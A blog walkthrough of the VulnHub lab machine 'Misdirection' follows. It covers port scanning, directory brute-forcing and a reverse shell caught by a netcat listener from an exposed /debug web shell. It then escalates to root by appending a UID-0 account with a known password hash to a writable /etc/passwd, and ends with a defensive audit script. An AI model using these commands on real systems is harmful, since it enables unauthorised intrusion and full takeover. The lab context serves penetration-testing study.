misdirection

Misdirection is a VulnHub machine. It is not hard, but the opening stage is easy to be misled by, and it is easy to mis-prioritise which target to go after and lose time; whether to grind on one point or move on quickly takes judgement, experience and a little wisdom. A webshell gives the foothold on the system, and two privilege escalations lead to root. The machine is very standard, with a small twist and some fun in it: a small-scale abstraction of a high-fidelity scenario, but the experience is excellent and full of detail.

The misdirection machine

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.139
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:37 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00057s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:20:A6:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.32 seconds

Ports 22, 80, 3306 and 8080 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80,3306,8080 192.1.1.139
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:38 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00024s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:bb:44:ee:f3:33:af:9f:a5:ce:b5:77:61:45:e4:36 (RSA)
| 256 67:7b:cb:4e:95:1b:78:08:8d:2a:b1:47:04:8d:62:87 (ECDSA)
|_ 256 59:04:1d:25:11:6d:89:a3:6c:6d:e4:e3:d2:3c:da:7d (ED25519)
80/tcp open http Rocket httpd 1.2.6 (Python 2.7.15rc1)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:0C:29:20:A6:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

The OS is Linux; port 80 runs a Python-based Rocket web server, and port 8080 shows the default Apache page.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.139
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:40 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00025s latency).

PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:20:A6:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

The UDP scan turned up nothing of particular value.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306,8080 192.1.1.139
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:38 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00024s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-sql-injection:
| Possible sqli for queries:
| http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Felections%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Ffeatures%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/register?_next=%2Finit%2Fdefault%2Ffeatures%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Ffeatures%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
| http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|_ http://192.1.1.139:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin/: Possible admin folder
| /admin/admin/: Possible admin folder
| /admin/backup/: Possible backup
| /admin/download/backup.sql: Possible database backup
| /examples/: Sample scripts
| /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
| /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/FCKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
| /admin/jscript/upload.php: Lizard Cart/Remote File upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
| /admin/jscript/upload.pl: Lizard Cart/Remote File upload
|_ /admin/jscript/upload.asp: Lizard Cart/Remote File upload
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.1.1.139
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.1.1.139:80/init/default/user/login?_next=/init/default/index
| Form id: auth_user_email__row
| Form action: #
|
| Path: http://192.1.1.139:80/init/default/elections
| Form id: auth_user_email__row
| Form action: #
|
| Path: http://192.1.1.139:80/init/default/user/request_reset_password?_next=/init/default/index
| Form id: auth_user_email__row
|_ Form action: #
3306/tcp open mysql
8080/tcp open http-proxy
| http-enum:
| /wordpress/: Blog
| /wordpress/wp-login.php: Wordpress login page.
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /debug/: Potentially interesting folder
| /development/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /help/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /manual/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
MAC Address: 00:0C:29:20:A6:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1098.22 seconds

The vulnerability scan output is quite long, so I moved on to looking at the web interfaces first.

Looking at the web services

Port 80 appears to be an online voting platform with a login page.

The login page reveals the framework the site was built with.

I tried searching for web2py.

It did turn up a list of vulnerabilities, including local file inclusion, XSS and CSRF. On closer reading, exploiting them requires knowing the name of the application component in use, [applicationname], which is where it gets difficult, so let's look at the other attack surfaces.

Prioritising attack paths

At this point, going by the vuln script results, port 8080 has a lot of directories, so let's try directory brute-forcing.

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.139:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.139:8080/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/22 10:33:46 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 318] [--> http://192.1.1.139:8080/images/]
/scripts (Status: 301) [Size: 319] [--> http://192.1.1.139:8080/scripts/]
/css (Status: 301) [Size: 315] [--> http://192.1.1.139:8080/css/]

/wordpress (Status: 301) [Size: 321] [--> http://192.1.1.139:8080/wordpress/]
/development (Status: 301) [Size: 323] [--> http://192.1.1.139:8080/development/]
/manual (Status: 301) [Size: 318] [--> http://192.1.1.139:8080/manual/]
/js (Status: 301) [Size: 314] [--> http://192.1.1.139:8080/js/]
/shell (Status: 301) [Size: 317] [--> http://192.1.1.139:8080/shell/]
/debug (Status: 301) [Size: 317] [--> http://192.1.1.139:8080/debug/]
/help (Status: 301) [Size: 316] [--> http://192.1.1.139:8080/help/]
/server-status (Status: 403) [Size: 278]
Progress: 218960 / 220561 (99.27%)
===============================================================
2023/06/22 10:34:06 Finished
===============================================================

Going through the directories above one by one, debug turns out to be the most direct attack surface, whereas I had put wordpress first and tried many approaches without getting a shell. For me the biggest lesson of this machine is to constantly weigh the priority of attack paths. When choosing, either go for the option with the lowest trial-and-error cost or for the attack surface you know best, and keep an overall picture of the attack surface in mind.

The debug directory

It is a directly interactive shell; I tried bash and python reverse shells in turn.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.139] 53380
$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@misdirection:/tmp$ whoami
whoami
www-data

Privilege escalation

Escalating to brexit

Basic enumeration

www-data@misdirection:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on localhost:
(brexit) NOPASSWD: /bin/bash
www-data@misdirection:/tmp$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
brexit@misdirection:/tmp$ whoami
whoami
brexit

sudo -l had a pleasant surprise in store; I looked up the sudo -u syntax on the spot, thanks to ChatGPT.

brexit@misdirection:/tmp$ id
id
uid=1000(brexit) gid=1000(brexit) groups=1000(brexit),24(cdrom),30(dip),46(plugdev),108(lxd)
brexit@misdirection:/tmp$ sudo -l
sudo -l
[sudo] password for brexit:

Sorry, try again.
[sudo] password for brexit:

Sorry, try again.
[sudo] password for brexit:

sudo: 3 incorrect password attempts
brexit@misdirection:/tmp$ cd ~
cd ~
brexit@misdirection:~$ ls
ls
start-vote.sh user.txt web2py
brexit@misdirection:~$ pwd
pwd
/home/brexit
brexit@misdirection:~$ cat user.txt
cat user.txt
404b9193154be7fbbc56d7534cb26339

The sensitive .viminfo file

Let's look at the home directory.

brexit@misdirection:~$ ls -liah
ls -liah
total 60K
402287 drwxr-xr-x 6 brexit brexit 4.0K Jun 1 2019 .
393218 drwxr-xr-x 3 root root 4.0K Jun 1 2019 ..
403447 -rw------- 1 brexit brexit 0 Jun 1 2019 .bash_history
402289 -rw-r--r-- 1 brexit brexit 220 Apr 4 2018 .bash_logout
402290 -rw-r--r-- 1 brexit brexit 3.7K Apr 4 2018 .bashrc
402295 drwx------ 3 brexit brexit 4.0K Jun 1 2019 .cache
402297 drwx------ 3 brexit brexit 4.0K Jun 1 2019 .gnupg
402259 drwxrwxr-x 3 brexit brexit 4.0K Jun 1 2019 .local
402288 -rw-r--r-- 1 brexit brexit 807 Apr 4 2018 .profile
402215 -rw-rw-r-- 1 brexit brexit 66 Jun 1 2019 .selected_editor
393356 -rw------- 1 brexit brexit 9.2K Jun 1 2019 .viminfo
402285 -rwxrwxr-x 1 brexit brexit 90 Jun 1 2019 start-vote.sh
393358 -r--r----- 1 brexit brexit 33 Jun 1 2019 user.txt
402661 drwxrwxr-x 16 brexit brexit 4.0K Jun 20 12:45 web2py

There is a sensitive file in the home directory, .viminfo. I overlooked it at first, which made the subsequent privilege escalation very hard, and it did not succeed. I tried escalating via pkexec and hunting for sensitive password files; I did manage to log in to mysql, but that password only worked for mysql, and the user passwords read from the database were md5 hashes. Online cracking got nowhere. This was a reminder to myself to learn the common privilege escalation techniques; the Red Team Notes privilege escalation videos need to go on the schedule.

brexit@misdirection:~$ cat .viminfo
cat .viminfo
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=latin1


# hlsearch on (H) or off (h):
~h
# Last Search Pattern:
~MSle0~/any

# Command Line History (newest to oldest):
:q!
|2,0,1559373596,,"q!"
:set paste
|2,0,1559353917,,"set paste"

# Search String History (newest to oldest):
?/any
|2,1,1559354744,47,"any"
?/anyserver
|2,1,1559354723,47,"anyserver"
?/port
|2,1,1559354713,47,"port"
?/127
|2,1,1559354712,47,"127"

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0 1 0 /etc/passwd
|4,48,1,0,1559373596,"/etc/passwd"
'1 1 0 ~/web2py/parameters_8000.py
|4,49,1,0,1559355323,"~/web2py/parameters_8000.py"
'2 1 0 ~/web2py/parameters_8000.py
|4,50,1,0,1559355267,"~/web2py/parameters_8000.py"
'3 318 9 ~/web2py/anyserver.py
|4,51,318,9,1559354953,"~/web2py/anyserver.py"

The .viminfo file exposes something very important: this user seems to have edited passwd at some point, so let's check the passwd file next.

brexit@misdirection:~$ ls -liah /etc/passwd
ls -liah /etc/passwd
153253 -rwxrwxr-- 1 root brexit 1.6K Jun 1 2019 /etc/passwd
brexit@misdirection:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false

Writing to the passwd file

So this user can modify the passwd file; let's look up how to add a user to passwd.

brexit@misdirection:~$ echo 'hack:zSZ7Whrr8hgwY:0:0::/root/:/bin/bash' >> /etc/passwd

brexit@misdirection:~$ su hack
su hack
Password: 123456
root@misdirection:/home/brexit# id
id
uid=0(root) gid=0(root) groups=0(root)
root@misdirection:/home/brexit# cd /root
cd /root
root@misdirection:/root# cat root.txt
cat root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
root@misdirection:/root# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:20:a6:ad brd ff:ff:ff:ff:ff:ff
inet 192.1.1.139/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1045sec preferred_lft 1045sec
inet6 fe80::20c:29ff:fe20:a6ad/64 scope link
valid_lft forever preferred_lft forever
root@misdirection:/root# uname -a
uname -a
Linux misdirection 4.15.0-212-generic #223-Ubuntu SMP Tue May 23 13:09:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

The approach in the Red Team Notes video is a bit cleaner, so I am recording his method as well. First use openssl to generate the hash.

brexit@misdirection:~$ openssl passwd -1 123456
openssl passwd -1 123456
$1$FE.gLBgw$N3gdTUY9k04o7TtwcU/HS/

Then look at the format of the root user's entry in passwd, and replace the username and the x with your own.

brexit@misdirection:~$ cat /etc/passwd | grep root
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
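As an added defensive check (not part of the original post): a small Python audit that flags the three conditions this escalation relied on, a group-writable /etc/passwd, an extra UID-0 account, and a password hash stored in passwd instead of shadow. The sample content is constructed from the entries shown above, and the 0o774 mode mirrors the -rwxrwxr-- seen on the target; on a live host you would feed it the file's text and os.stat().st_mode instead.

```python
import stat

# Constructed sample modelled on the target: the root and brexit lines from
# /etc/passwd plus the injected "hack" line with the openssl MD5-crypt hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
hack:$1$FE.gLBgw$N3gdTUY9k04o7TtwcU/HS/:0:0::/root/:/bin/bash
"""

def parse_passwd(text):
    """Split passwd text into dicts; keep malformed lines so they get flagged."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            entries.append({"name": line, "malformed": True})
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        entries.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "home": home, "shell": shell, "malformed": False})
    return entries

def audit_entries(entries):
    """Return findings: non-root UID-0 accounts and unshadowed password fields."""
    findings = []
    for e in entries:
        if e["malformed"] or not e["uid"].isdigit():
            findings.append(f"malformed entry: {e['name']!r}")
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"extra UID-0 account: {e['name']}")
        # 'x' means the hash lives in /etc/shadow; '*' and '!...' are locked.
        if e["pw"] != "x" and e["pw"] != "*" and not e["pw"].startswith("!"):
            findings.append(f"unshadowed password field for {e['name']}")
    return findings

def audit_mode(mode):
    """Flag group/world write bits; /etc/passwd should be 0644, owned by root."""
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

if __name__ == "__main__":
    print(audit_mode(0o774) + audit_entries(parse_passwd(SAMPLE_PASSWD)))
```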

misdirection
https://i3eg1nner.github.io/2023/06/efe95bcd539b.html
Author: I3eg1nner
Published: 22 June 2023